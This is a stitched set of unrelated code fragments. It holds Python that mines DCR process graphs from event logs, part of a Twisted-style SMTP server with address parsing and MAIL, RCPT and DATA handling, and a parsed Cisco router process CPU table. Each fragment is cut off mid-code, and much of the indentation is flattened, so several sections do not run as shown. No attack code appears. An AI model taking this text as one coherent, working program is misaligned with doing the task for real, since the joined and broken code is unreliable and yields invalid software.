self.graph['responseTo'] = deepcopy(self.logAbstraction['responseTo'])
# Remove redundant responses
self.graph['responseTo'] = self.optimizeRelation(self.graph['responseTo'])
# Mine conditions from logAbstraction
self.graph['conditionsFor'] = deepcopy(self.logAbstraction['precedenceFor'])
# remove redundant conditions
self.graph['conditionsFor'] = self.optimizeRelation(self.graph['conditionsFor'])
# For each chainprecedence(i,j) we add: include(i,j) exclude(j,j)
for j in self.logAbstraction['chainPrecedenceFor']:
for i in self.logAbstraction['chainPrecedenceFor'][j]:
self.graph['includesTo'][i].add(j)
self.graph['excludesTo'][j].add(j)
# Additional excludes based on predecessors / successors
for event in self.logAbstraction['events']:
# Union of predecessor and successors sets, i.e. all events occuring in the same trace as event
coExisters = self.logAbstraction['predecessor'][event].union(self.logAbstraction['successor'][event])
nonCoExisters = self.logAbstraction['events'].difference(coExisters)
nonCoExisters.discard(event)
# Note that if events i & j do not co-exist, they should exclude each other.
# Here we only add i -->% j, but on the iteration for j, j -->% i will be added.
self.graph['excludesTo'][event] = self.graph['excludesTo'][event].union(nonCoExisters)
# if s precedes (event) but never succeeds (event) add (event) -->% s if s -->% s does not exist
precedesButNeverSuceeds = self.logAbstraction['predecessor'][event].difference(self.logAbstraction['successor'][event])
for s in precedesButNeverSuceeds:
if not s in self.graph['excludesTo'][s]:
self.graph['excludesTo'][event].add(s)
# Removing redundant excludes.
# If r always precedes s, and r -->% t, then s -->% t is (mostly) redundant
for s in self.logAbstraction['precedenceFor']:
for r in self.logAbstraction['precedenceFor'][s]:
for t in self.graph['excludesTo'][r]:
self.graph['excludesTo'][s].discard(t)
if findAdditionalConditions:
# Mining additional conditions:
# Every event, x, that occurs before some event, y, is a possible candidate for a condition x -->* y
# This is due to the fact, that in the traces where x does not occur before y, x might be excluded
possibleConditions = deepcopy(self.logAbstraction['predecessor'])
# Replay entire log, filtering out any invalid conditions
for trace in self.logAbstraction['traces']:
localSeenBefore = set()
included = self.logAbstraction['events'].copy()
for event_dict in trace:
event = event_dict['concept:name']
# Compute conditions that still allow event to be executed
excluded = self.logAbstraction['events'].difference(included)
validConditions = localSeenBefore.union(excluded)
# Only keep valid conditions
possibleConditions[event] = possibleConditions[event].intersection(validConditions)
# Execute excludes starting from (event)
included = included.difference(self.graph['excludesTo'][event])
# Execute includes starting from (event)
included = included.union(self.graph['includesTo'][event])
# Now the only possibleCondtitions that remain are valid for all traces
# These are therefore added to the graph
for key in self.graph['conditionsFor']:
self.graph['conditionsFor'][key] = self.graph['conditionsFor'][key].union(possibleConditions[key])
# Removing redundant conditions
self.graph['conditionsFor'] = self.optimizeRelation(self.graph['conditionsFor'])
return 0
def writeGraph(self,graph_path,timings=None):
'''
timings will be saved into the ISO 8601 duration format
:param graph_path:
:param timings:
:return:
'''
data = ''
withTimings = False
if timings:
withTimings = True
for event in self.graph['events']:
data = data + 'EVENT,' + event + '\n'
for endEvent in self.graph['conditionsFor']:
for startEvent in self.graph['conditionsFor'][endEvent]:
if withTimings and (('CONDITION',startEvent,endEvent) in timings.keys()):
data = data + 'CONDITION,' + startEvent + ',' + endEvent + ',' + 'DELAY,P' + str(int(timings[('CONDITION',startEvent,endEvent)])) +'D\n'
else:
data = data + 'CONDITION,' + startEvent + ',' + endEvent + '\n'
for startEvent in self.graph['responseTo']:
for endEvent in self.graph['responseTo'][startEvent]:
if withTimings and (('RESPONSE',startEvent,endEvent) in timings.keys()):
data = data + 'RESPONSE,' + startEvent + ',' + endEvent + ',' + 'DEADLINE,P' + str(int(timings[('RESPONSE',startEvent,endEvent)])) +'D\n'
else:
data = data + 'RESPONSE,' + startEvent + ',' + endEvent + '\n'
for startEvent in self.graph['excludesTo']:
for endEvent in self.graph['excludesTo'][startEvent]:
data = data + 'EXCLUDE,'+ startEvent + ',' + endEvent + '\n'
for startEvent in self.graph['includesTo']:
for endEvent in self.graph['includesTo'][startEvent]:
data = data + 'INCLUDE,'+ startEvent + ',' + endEvent + '\n'
with open(graph_path,'w+') as f:
f.write(data)
def write_with_do_subprocesses(self,graph_path,timings):
data = ''
withTimings = False
if timings:
withTimings = True
subprocesses = {}
for startEvent in self.graph['excludesTo']:
for endEvent in self.graph['excludesTo'][startEvent]:
if startEvent==endEvent:
if startEvent not in subprocesses.keys():
subprocesses[startEvent] = set()
subprocesses[startEvent].add(f'DO {startEvent}')
for event in self.graph['events']:
data = data + 'EVENT,' + event + '\n'
for subprocess_name,subprocess_events in subprocesses.items():
sub_events = '['
for event in subprocess_events:
sub_events = sub_events + event + ','
sub_events = sub_events[:-1] + ']'
data = data + 'SUBPROCESS,' +subprocess_name+ sub_events + '\n'
for endEvent in self.graph['conditionsFor']:
for startEvent in self.graph['conditionsFor'][endEvent]:
if withTimings and (('CONDITION',startEvent,endEvent) in timings.keys()):
data = data + 'CONDITION,' + startEvent + ',' + endEvent + ',' + 'DELAY,P' + str(int(timings[('CONDITION',startEvent,endEvent)])) +'D\n'
else:
data = data + 'CONDITION,' + startEvent + ',' + endEvent + '\n'
for startEvent in self.graph['responseTo']:
for endEvent in self.graph['responseTo'][startEvent]:
if withTimings and (('RESPONSE',startEvent,endEvent) in timings.keys()):
data = data + 'RESPONSE,' + startEvent + ',' + endEvent + ',' + 'DEADLINE,P' + str(int(timings[('RESPONSE',startEvent,endEvent)])) +'D\n'
else:
data = data + 'RESPONSE,' + startEvent + ',' + endEvent + '\n'
for startEvent in self.graph['excludesTo']:
for endEvent in self.graph['excludesTo'][startEvent]:
if startEvent==endEvent:
data = data + 'EXCLUDE,DO '+ startEvent + ',DO ' + endEvent + '\n'
else:
data = | |
re.compile(atom) # match any one atom character
    def __init__(self, addr, defaultDomain=None):
        """Parse an RFC 2821 address into ``local`` and ``domain`` parts.

        ``addr`` may be a User (its dest is used), another Address (its
        fields are copied), or anything convertible to a string.  A source
        route (``@a,@b:user@c``) is accepted and discarded.  If the address
        has a local part but no domain, ``defaultDomain`` (or this host's
        DNSNAME) is used.

        Raises AddressError for unbalanced angle brackets, a malformed
        source route, multiple @ signs, or an illegal character.
        """
        if isinstance(addr, User):
            addr = addr.dest
        if isinstance(addr, Address):
            # Copy constructor: duplicate the parsed fields and stop.
            self.__dict__ = addr.__dict__.copy()
            return
        elif not isinstance(addr, types.StringTypes):
            addr = str(addr)
        self.addrstr = addr
        # Tokenize
        atl = filter(None,self.tstring.split(addr))
        local = []
        domain = []
        # Consume tokens left to right; ``local`` collects tokens until the
        # first '@' switches collection over to ``domain``.
        while atl:
            if atl[0] == '<':
                if atl[-1] != '>':
                    raise AddressError, "Unbalanced <>"
                # Strip the surrounding angle brackets and keep parsing.
                atl = atl[1:-1]
            elif atl[0] == '@':
                atl = atl[1:]
                if not local:
                    # Source route
                    while atl and atl[0] != ':':
                        # remove it
                        atl = atl[1:]
                    if not atl:
                        raise AddressError, "Malformed source route"
                    atl = atl[1:] # remove :
                elif domain:
                    raise AddressError, "Too many @"
                else:
                    # Now in domain
                    domain = ['']
            elif len(atl[0]) == 1 and not self.atomre.match(atl[0]) and atl[0] != '.':
                raise AddressError, "Parse error at %r of %r" % (atl[0], (addr, atl))
            else:
                if not domain:
                    local.append(atl[0])
                else:
                    domain.append(atl[0])
                atl = atl[1:]
        self.local = ''.join(local)
        self.domain = ''.join(domain)
        if self.local != '' and self.domain == '':
            if defaultDomain is None:
                defaultDomain = DNSNAME
            self.domain = defaultDomain
dequotebs = re.compile(r'\\(.)')
def dequote(self,addr):
"""Remove RFC-2821 quotes from address."""
res = []
atl = filter(None,self.tstring.split(str(addr)))
for t in atl:
if t[0] == '"' and t[-1] == '"':
res.append(t[1:-1])
elif '\\' in t:
res.append(self.dequotebs.sub(r'\1',t))
else:
res.append(t)
return ''.join(res)
def __str__(self):
if self.local or self.domain:
return '@'.join((self.local, self.domain))
else:
return ''
def __repr__(self):
return "%s.%s(%s)" % (self.__module__, self.__class__.__name__,
repr(str(self)))
class User:
    """Hold information about an SMTP message recipient, including
    information on where the message came from.
    """
    def __init__(self, destination, helo, protocol, orig):
        # Fall back to no default domain when the protocol carries no host.
        host = getattr(protocol, 'host', None)
        self.dest = Address(destination, host)
        self.helo = helo
        self.protocol = protocol
        self.orig = orig if isinstance(orig, Address) else Address(orig, host)
    def __getstate__(self):
        """Helper for pickle.

        protocol isn't picklable, but we want User to be, so skip it in
        the pickle.
        """
        return dict(dest=self.dest,
                    helo=self.helo,
                    protocol=None,
                    orig=self.orig)
    def __str__(self):
        return str(self.dest)
class IMessage(Interface):
    """Interface definition for messages that can be sent via SMTP."""
    def lineReceived(line):
        """Handle another line of the incoming message."""
    def eomReceived():
        """Handle end of message.

        return a deferred. The deferred should be called with either:
        callback(string) or errback(error)
        """
    def connectionLost():
        """Handle message truncated.

        semantics should be to discard the message
        """
class SMTP(basic.LineOnlyReceiver, policies.TimeoutMixin):
    """SMTP server-side protocol."""
    # Seconds of inactivity before the connection is dropped (see
    # timeoutConnection).
    timeout = 600
    # Hostname used in the banner, HELO reply and default address domain.
    host = DNSNAME
    # Optional cred portal; None means no authentication support.
    portal = None
    # Control whether we log SMTP events
    noisy = True
    # A factory for IMessageDelivery objects. If an
    # avatar implementing IMessageDeliveryFactory can
    # be acquired from the portal, it will be used to
    # create a new IMessageDelivery object for each
    # message which is received.
    deliveryFactory = None
    # An IMessageDelivery object. A new instance is
    # used for each message received if we can get an
    # IMessageDeliveryFactory from the portal. Otherwise,
    # a single instance is used throughout the lifetime
    # of the connection.
    delivery = None
    # Cred cleanup function.
    _onLogout = None
    def __init__(self, delivery=None, deliveryFactory=None):
        """Start in COMMAND mode with an empty mail transaction.

        :param delivery: optional IMessageDelivery used for every message
        :param deliveryFactory: optional IMessageDeliveryFactory consulted
            per message
        """
        self.mode = COMMAND
        self._from = None
        self._helo = None
        self._to = []
        self.delivery = delivery
        self.deliveryFactory = deliveryFactory
def timeoutConnection(self):
msg = '%s Timeout. Try talking faster next time!' % (self.host,)
self.sendCode(421, msg)
self.transport.loseConnection()
def greeting(self):
return '%s NO UCE NO UBE NO RELAY PROBES' % (self.host,)
    def connectionMade(self):
        """Greet the new client with the 220 banner and start the idle timer."""
        # Ensure user-code always gets something sane for _helo
        peer = self.transport.getPeer()
        try:
            host = peer.host
        except AttributeError: # not an IPv4Address
            host = str(peer)
        # _helo is (client-supplied name, client address); no HELO seen yet.
        self._helo = (None, host)
        self.sendCode(220, self.greeting())
        self.setTimeout(self.timeout)
def sendCode(self, code, message=''):
"Send an SMTP code with a message."
lines = message.splitlines()
lastline = lines[-1:]
for line in lines[:-1]:
self.sendLine('%3.3d-%s' % (code, line))
self.sendLine('%3.3d %s' % (code,
lastline and lastline[0] or ''))
def lineReceived(self, line):
self.resetTimeout()
return getattr(self, 'state_' + self.mode)(line)
def state_COMMAND(self, line):
# Ignore leading and trailing whitespace, as well as an arbitrary
# amount of whitespace between the command and its argument, though
# it is not required by the protocol, for it is a nice thing to do.
line = line.strip()
parts = line.split(None, 1)
if parts:
method = self.lookupMethod(parts[0]) or self.do_UNKNOWN
if len(parts) == 2:
method(parts[1])
else:
method('')
else:
self.sendSyntaxError()
    def sendSyntaxError(self):
        """Reply 500 to a line that could not be parsed as a command."""
        self.sendCode(500, 'Error: bad syntax')
def lookupMethod(self, command):
return getattr(self, 'do_' + command.upper(), None)
    def lineLengthExceeded(self, line):
        """Handle an over-long line: if a message body was being collected,
        discard the in-progress messages and fall back to COMMAND mode,
        then answer with a 500 reply.
        """
        if self.mode is DATA:
            for message in self.__messages:
                message.connectionLost()
            self.mode = COMMAND
            del self.__messages
        self.sendCode(500, 'Line too long')
    def do_UNKNOWN(self, rest):
        """Fallback handler for commands with no matching do_* method."""
        self.sendCode(500, 'Command not implemented')
    def do_HELO(self, rest):
        """Record the client's HELO identity and reset the mail transaction."""
        peer = self.transport.getPeer()
        try:
            host = peer.host
        except AttributeError:
            host = str(peer)
        self._helo = (rest, host)
        # A fresh HELO aborts any half-built MAIL/RCPT transaction.
        self._from = None
        self._to = []
        self.sendCode(250, '%s Hello %s, nice to meet you' % (self.host, host))
    def do_QUIT(self, rest):
        """Acknowledge QUIT with 221 and close the transport."""
        self.sendCode(221, 'See you later')
        self.transport.loseConnection()
# A string of quoted strings, backslash-escaped character or
# atom characters + '@.,:'
qstring = r'("[^"]*"|\\.|' + atom + r'|[@.,:])+'
mail_re = re.compile(r'''\s*FROM:\s*(?P<path><> # Empty <>
|<''' + qstring + r'''> # <addr>
|''' + qstring + r''' # addr
)\s*(\s(?P<opts>.*))? # Optional WS + ESMTP options
$''',re.I|re.X)
rcpt_re = re.compile(r'\s*TO:\s*(?P<path><' + qstring + r'''> # <addr>
|''' + qstring + r''' # addr
)\s*(\s(?P<opts>.*))? # Optional WS + ESMTP options
$''',re.I|re.X)
    def do_MAIL(self, rest):
        """Handle MAIL FROM: parse the reverse-path and validate the sender.

        validateFrom may return a Deferred; success or failure is reported
        through _cbFromValidate / _ebFromValidate.
        """
        if self._from:
            self.sendCode(503,"Only one sender per message, please")
            return
        # Clear old recipient list
        self._to = []
        m = self.mail_re.match(rest)
        if not m:
            self.sendCode(501, "Syntax error")
            return
        try:
            addr = Address(m.group('path'), self.host)
        except AddressError, e:
            self.sendCode(553, str(e))
            return
        validated = defer.maybeDeferred(self.validateFrom, self._helo, addr)
        validated.addCallbacks(self._cbFromValidate, self._ebFromValidate)
    def _cbFromValidate(self, from_, code=250, msg='Sender address accepted'):
        """validateFrom success path: remember the sender and reply."""
        self._from = from_
        self.sendCode(code, msg)
    def _ebFromValidate(self, failure):
        """validateFrom failure path: map the failure onto an SMTP reply."""
        if failure.check(SMTPBadSender):
            self.sendCode(failure.value.code,
                          'Cannot receive from specified address %s: %s'
                          % (quoteaddr(failure.value.addr), failure.value.resp))
        elif failure.check(SMTPServerError):
            self.sendCode(failure.value.code, failure.value.resp)
        else:
            # Unexpected error: log it and answer with a transient failure.
            log.err(failure, "SMTP sender validation failure")
            self.sendCode(
                451,
                'Requested action aborted: local error in processing')
    def do_RCPT(self, rest):
        """Handle RCPT TO: parse the forward-path and validate the recipient.

        validateTo may return a Deferred; the result is handled by
        _cbToValidate / _ebToValidate.
        """
        if not self._from:
            self.sendCode(503, "Must have sender before recipient")
            return
        m = self.rcpt_re.match(rest)
        if not m:
            self.sendCode(501, "Syntax error")
            return
        try:
            user = User(m.group('path'), self._helo, self, self._from)
        except AddressError, e:
            self.sendCode(553, str(e))
            return
        d = defer.maybeDeferred(self.validateTo, user)
        d.addCallbacks(
            self._cbToValidate,
            self._ebToValidate,
            callbackArgs=(user,)
        )
    def _cbToValidate(self, to, user=None, code=250, msg='Recipient address accepted'):
        """validateTo success path: record the (user, message-factory) pair."""
        if user is None:
            user = to
        self._to.append((user, to))
        self.sendCode(code, msg)
    def _ebToValidate(self, failure):
        """validateTo failure path: known SMTP errors keep their reply code,
        anything else is logged and reported as a transient 451 failure.
        """
        if failure.check(SMTPBadRcpt, SMTPServerError):
            self.sendCode(failure.value.code, failure.value.resp)
        else:
            log.err(failure)
            self.sendCode(
                451,
                'Requested action aborted: local error in processing'
            )
    def _disconnect(self, msgs):
        """Best-effort notification that the given message objects are dead."""
        for msg in msgs:
            try:
                msg.connectionLost()
            except:
                # Deliberate broad catch: cleanup of the remaining messages
                # must not abort because one of them misbehaves.
                log.msg("msg raised exception from connectionLost")
                log.err()
    def do_DATA(self, rest):
        """Handle DATA: switch to message-collection mode.

        Builds one message object per accepted recipient, feeds each the
        generated Received: header, then replies 354 so the client starts
        sending the message body.
        """
        if self._from is None or (not self._to):
            self.sendCode(503, 'Must have valid receiver and originator')
            return
        self.mode = DATA
        # Consume the transaction state now so a failure below cannot leave
        # a half-finished transaction behind.
        helo, origin = self._helo, self._from
        recipients = self._to
        self._from = None
        self._to = []
        self.datafailed = None
        msgs = []
        for (user, msgFunc) in recipients:
            try:
                msg = msgFunc()
                rcvdhdr = self.receivedHeader(helo, origin, [user])
                if rcvdhdr:
                    msg.lineReceived(rcvdhdr)
                msgs.append(msg)
            except SMTPServerError, e:
                self.sendCode(e.code, e.resp)
                self.mode = COMMAND
                self._disconnect(msgs)
                return
            except:
                log.err()
                self.sendCode(550, "Internal server error")
                self.mode = COMMAND
                self._disconnect(msgs)
                return
        self.__messages = msgs
        self.__inheader = self.__inbody = 0
        self.sendCode(354, 'Continue')
        if self.noisy:
            fmt = 'Receiving message for delivery: from=%s to=%s'
            log.msg(fmt % (origin, [str(u) for (u, f) in recipients]))
    def connectionLost(self, reason):
        """Clean up when the transport goes away: discard any half-received
        message, run the cred logout callback, and cancel the idle timer.
        """
        # self.sendCode(421, 'Dropping connection.') # This does nothing...
        # Ideally, if we (rather than the other side) lose the connection,
        # we should be able to tell the other side that we are going away.
        # RFC-2821 requires that we try.
        if self.mode is DATA:
            try:
                for message in self.__messages:
                    try:
                        message.connectionLost()
                    except:
                        log.err()
                del self.__messages
            except AttributeError:
                # __messages may already be gone (e.g. lineLengthExceeded).
                pass
        if self._onLogout:
            self._onLogout()
            self._onLogout = None
        self.setTimeout(None)
    def do_RSET(self, rest):
        """Handle RSET: drop any in-progress mail transaction state."""
        self._from = None
        self._to = []
        self.sendCode(250, 'I remember nothing.')
def dataLineReceived(self, line):
if line[:1] == '.':
if line == '.':
self.mode = COMMAND
if self.datafailed:
self.sendCode(self.datafailed.code,
self.datafailed.resp)
return
if not self.__messages:
self._messageHandled("thrown away")
return
defer.DeferredList([
m.eomReceived() for m in self.__messages
], consumeErrors=True).addCallback(self._messageHandled
)
del self.__messages
return
line = line[1:]
if self.datafailed:
return
try:
# Add a blank line between the generated Received:-header
# and the message body if the message | |
536: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 549,
'one_min_cpu': 0.0,
'pid': 540,
'process': 'LDP Background',
'runtime': 266,
'tty': 0,
'usecs': 484},
537: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 254919,
'one_min_cpu': 0.0,
'pid': 541,
'process': 'MCP RP EFP proce',
'runtime': 1468,
'tty': 0,
'usecs': 5},
538: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 207,
'one_min_cpu': 0.0,
'pid': 542,
'process': 'BGP Event',
'runtime': 9701,
'tty': 0,
'usecs': 46864},
539: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 2902,
'one_min_cpu': 0.0,
'pid': 543,
'process': 'LDP Main',
'runtime': 149,
'tty': 0,
'usecs': 51},
540: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 15020,
'one_min_cpu': 0.0,
'pid': 544,
'process': 'LDP Hello',
'runtime': 854,
'tty': 0,
'usecs': 56},
541: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 1320,
'one_min_cpu': 0.0,
'pid': 545,
'process': 'BGP Task',
'runtime': 13752,
'tty': 0,
'usecs': 10418},
542: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 1,
'one_min_cpu': 0.0,
'pid': 546,
'process': 'BGP BMP Server',
'runtime': 0,
'tty': 0,
'usecs': 0},
543: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 93,
'one_min_cpu': 0.0,
'pid': 547,
'process': 'TCP Listener',
'runtime': 0,
'tty': 0,
'usecs': 0},
544: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 551,
'one_min_cpu': 0.0,
'pid': 548,
'process': 'IPRM',
'runtime': 2,
'tty': 0,
'usecs': 3},
545: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 673,
'one_min_cpu': 0.0,
'pid': 549,
'process': 'IP SNMP',
'runtime': 36,
'tty': 0,
'usecs': 53},
546: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 1,
'one_min_cpu': 0.0,
'pid': 550,
'process': 'PDU DISPATCHER',
'runtime': 0,
'tty': 0,
'usecs': 0},
547: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 4,
'one_min_cpu': 0.0,
'pid': 551,
'process': 'SNMP ENGINE',
'runtime': 1,
'tty': 0,
'usecs': 250},
548: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 2,
'one_min_cpu': 0.0,
'pid': 552,
'process': 'IP SNMPV6',
'runtime': 0,
'tty': 0,
'usecs': 0},
549: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 1,
'one_min_cpu': 0.0,
'pid': 553,
'process': 'SNMP ConfCopyPro',
'runtime': 0,
'tty': 0,
'usecs': 0},
550: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 387,
'one_min_cpu': 0.0,
'pid': 554,
'process': 'SNMP Traps',
'runtime': 416,
'tty': 0,
'usecs': 1074},
551: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 33806,
'one_min_cpu': 0.0,
'pid': 555,
'process': 'NTP',
'runtime': 851,
'tty': 0,
'usecs': 25},
552: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 1,
'one_min_cpu': 0.0,
'pid': 556,
'process': 'EM Action CNS',
'runtime': 0,
'tty': 0,
'usecs': 0},
553: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 2,
'one_min_cpu': 0.0,
'pid': 557,
'process': 'DiagCard5/-1',
'runtime': 0,
'tty': 0,
'usecs': 0},
554: {'five_min_cpu': 0.73,
'five_sec_cpu': 0.55,
'invoked': 78644,
'one_min_cpu': 0.72,
'pid': 558,
'process': 'BGP Router',
'runtime': 307942,
'tty': 0,
'usecs': 3915},
555: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 10680,
'one_min_cpu': 0.0,
'pid': 559,
'process': 'OSPF-65109 Hello',
'runtime': 311,
'tty': 0,
'usecs': 29},
556: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 1,
'one_min_cpu': 0.0,
'pid': 560,
'process': 'BGP VA',
'runtime': 0,
'tty': 0,
'usecs': 0},
557: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 1,
'one_min_cpu': 0.0,
'pid': 561,
'process': 'IFCOM Msg Hdlr',
'runtime': 0,
'tty': 0,
'usecs': 0},
558: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 1,
'one_min_cpu': 0.0,
'pid': 562,
'process': 'IFCOM Msg Hdlr',
'runtime': 0,
'tty': 0,
'usecs': 0},
559: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 1,
'one_min_cpu': 0.0,
'pid': 563,
'process': 'IFCOM Msg Hdlr',
'runtime': 0,
'tty': 0,
'usecs': 0},
560: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 1,
'one_min_cpu': 0.0,
'pid': 564,
'process': 'IFCOM Msg Hdlr',
'runtime': 0,
'tty': 0,
'usecs': 0},
561: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 1,
'one_min_cpu': 0.0,
'pid': 565,
'process': 'Network Synchron',
'runtime': 0,
'tty': 0,
'usecs': 0},
562: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 127232,
'one_min_cpu': 0.0,
'pid': 566,
'process': 'CCM Subscriber P',
'runtime': 862,
'tty': 0,
'usecs': 6},
563: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 4,
'one_min_cpu': 0.0,
'pid': 567,
'process': 'Process to do EH',
'runtime': 0,
'tty': 0,
'usecs': 0},
564: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 11,
'one_min_cpu': 0.0,
'pid': 568,
'process': 'RFS server proce',
'runtime': 0,
'tty': 0,
'usecs': 0},
565: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 2,
'one_min_cpu': 0.0,
'pid': 569,
'process': 'IP MPLS Service',
'runtime': 0,
'tty': 0,
'usecs': 0},
566: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 1,
'one_min_cpu': 0.0,
'pid': 570,
'process': 'HA-IDB-SYNC',
'runtime': 0,
'tty': 0,
'usecs': 0},
567: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 2,
'one_min_cpu': 0.0,
'pid': 571,
'process': 'VTEMPLATE Backgr',
'runtime': 0,
'tty': 0,
'usecs': 0},
568: {'five_min_cpu': 0.75,
'five_sec_cpu': 0.0,
'invoked': 9517,
'one_min_cpu': 0.28,
'pid': 573,
'process': 'Virtual Exec',
'runtime': 4487,
'tty': 2,
'usecs': 471},
569: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 15,
'one_min_cpu': 0.0,
'pid': 574,
'process': 'L2FIB HA Flow Th',
'runtime': 4,
'tty': 0,
'usecs': 266},
570: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 75795,
'one_min_cpu': 0.0,
'pid': 575,
'process': 'Virtual Exec',
'runtime': 66557,
'tty': 3,
'usecs': 878},
571: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 19063,
'one_min_cpu': 0.0,
'pid': 576,
'process': 'Virtual Exec',
'runtime': 13105,
'tty': 4,
'usecs': 687},
572: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 797,
'one_min_cpu': 0.0,
'pid': 577,
'process': 'Virtual Exec',
'runtime': 4208,
'tty': 5,
'usecs': 5279},
573: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 542,
'one_min_cpu': 0.0,
'pid': 578,
'process': 'Virtual Exec',
'runtime': 71,
'tty': 6,
'usecs': 130},
574: {'five_min_cpu': 0.0,
'five_sec_cpu': 0.0,
'invoked': 448,
'one_min_cpu': 0.0,
'pid': 606,
'process': 'LCON Addr',
'runtime': 17,
'tty': 0,
'usecs': 37}},
'zero_cpu_processes': ['Chunk Manager',
'Load Meter',
'SpanTree Helper',
'Retransmission o',
'IPC ISSU Dispatc',
'RF Slave Main Th',
'EDDRI_MAIN',
'RO Notify Timers',
'Pool Manager',
'DiscardQ Backgro',
'Timers',
'WATCH_AFS',
'MEMLEAK PROCESS',
'ARP Input',
'ARP Background',
'ATM Idle Timer',
'ATM ASYNC PROC',
'AAA_SERVER_DEADT',
'Policy Manager',
'DDR Timers',
'Entity MIB API',
'PrstVbl',
'RMI RM Notify Wa',
'IOSXE heartbeat',
'ATM AutoVC Perio',
'ATM VC Auto Crea',
'IPC Apps Task',
'ifIndex Receive',
'IPC Event Notifi',
'IPC Mcast Pendin',
'ASR1000 appsess',
'IPC Dynamic Cach',
'IPC Service NonC',
'IPC Zone Manager',
'IPC Periodic Tim',
'IPC Deferred Por',
'IPC Process leve',
'IPC Seat Manager',
'IPC Check Queue',
'IPC Seat RX Cont',
'IPC Seat TX Cont',
'IPC Keep Alive M',
'IPC Loadometer',
'IPC Session Deta',
'SENSOR-MGR event',
'Compute SRP rate',
'CEF MIB API',
'Serial Backgroun',
'GraphIt',
'Dialer event',
'IOSXE signals IO',
'SMART',
'client_entity_se',
'RF SCTPthread',
'CHKPT RG SCTPthr',
'Critical Bkgnd',
'Net Background',
'IDB Work',
'Logger',
'TTY Background',
'BACK CHECK',
'IOSD chasfs task',
'REDUNDANCY FSM',
'SBC IPC Hold Que',
'Punt FP Stats Du',
'PuntInject Keepa',
'IF-MGR control p',
'IF-MGR event pro',
'cpf_msg_holdq_pr',
'cpf_msg_rcvq_pro',
'cpf_process_tpQ',
'Network-rf Notif',
'Environmental Mo',
'RP HA Periodic',
'CONSOLE helper p',
'CEF RRP RF waite',
'CWAN APS HA Proc',
'REDUNDANCY peer',
'100ms check',
'RF CWAN HA Proce',
'CWAN IF EVENT HA',
'ANCP HA',
'ANCP HA IPC flow',
'QoS HA ID RETAIN',
'CHKPT Test clien',
'CHKPT Test clien',
'CHKPT Test clien',
'CHKPT Test clien',
'CHKPT Test clien',
'CHKPT Test clien',
'CHKPT Test clien',
'CHKPT Test clien',
'CHKPT Test clien',
'CHKPT Test clien',
'CHKPT Test clien',
'DHCPC HA',
'DHCPD HA',
'DHCPv6 Relay HA',
'DHCPv6 Server HA',
'Metadata HA',
'FMD HA IPC flow',
'SISF HA Process',
'ARP HA',
'XDR RRP RF waite',
'IOSXE-RP Punt IP',
'IOSXE-RP SPA TSM',
'RF Master Main T',
'RF Master Status',
'Net Input',
'OTV Event Dispat',
'Compute load avg',
'Per-minute Jobs',
'mLDP Process',
'Transport Port A',
'EEM ED ND',
'IOSXE-RP FastPat',
'Src Fltr backgro',
'DSX3MIB ll handl',
'fanrp_l2fib',
'POS APS Event Pr',
'netclk_process',
'netclk_ha_proces',
'FPD Management P',
'FPD Action Proce',
'BFD HW EVENT',
'BFD IPV6 ADDR CH',
'FEC_Link_event_h',
'MCP RP autovc pr',
'VMI Background',
'MGMTE stats Proc',
'Ether-SPA backgr',
'CWAN CHOCX PROCE',
'CE3 Mailbox',
'CT3 Mailbox',
'HAL Mailbox',
'MIP Mailbox',
'CWAN OIR Handler',
'TP CUTOVER EVENT',
'ASR1K ESMC Proce',
'ASR1000-RP SPA A',
'RTTYS Process',
'AAA Server',
'AAA ACCT Proc',
'ACCT Periodic Pr',
'cdp init process',
'Call Home Timer',
'CEF switching ba',
'ADJ NSF process',
'AAA Dictionary R',
'FHRP Main thread',
'TRACK Main threa',
'TRACK Client thr',
'VRRP Main thread',
'ATM OAM Input',
'ATM OAM TIMER',
'HQF TARGET DYNAM',
'IP ARP Adjacency',
'IP Input',
'ICMP event handl',
'mDNS',
'PIM register asy',
'IPv6 ping proces',
'BGP Scheduler',
'MOP Protocols',
'PPP SIP',
'PPP Bind',
'PPP IP Route',
